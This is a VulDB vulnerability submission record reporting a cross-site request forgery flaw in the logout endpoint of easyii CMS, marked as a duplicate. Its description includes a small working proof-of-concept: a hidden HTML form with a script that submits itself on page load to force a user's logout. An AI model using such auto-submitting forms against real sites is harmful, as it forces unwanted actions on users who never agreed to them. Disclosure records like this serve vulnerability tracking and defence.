जमा करें #189: CSRF in easyii CMS logoutजानकारी

शीर्षक	CSRF in easyii CMS logout
विवरण	can force logout any user with vulnerable endpoint: http://example.com/admin/sign/out and automate with auto submit form <form method='GET' action='http://example.com/admin/sign/out' target="csrf-frame" id="csrf-form"> <input type='hidden' name='criticaltoggle' value='true'> <input style="display:none;" type='submit' value='submit'> </form> <script>document.getElementById("csrf-form").submit()</script>
स्रोत	⚠️ https://github.com/noumo/easyii/
उपयोगकर्ता	rezaduty (UID 10530)
सबमिशन	25/08/2020 05:22 PM (6 साल पहले)
संयम	26/08/2020 09:52 AM (17 hours later)
स्थिति	प्रतिलिपि
VulDB प्रविष्टि	160278 [easyii CMS /admin/sign/out क्रॉस साइट रिक्वेस्ट फॉर्जरी]
व्याख्या	duplicate
अंक	0

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!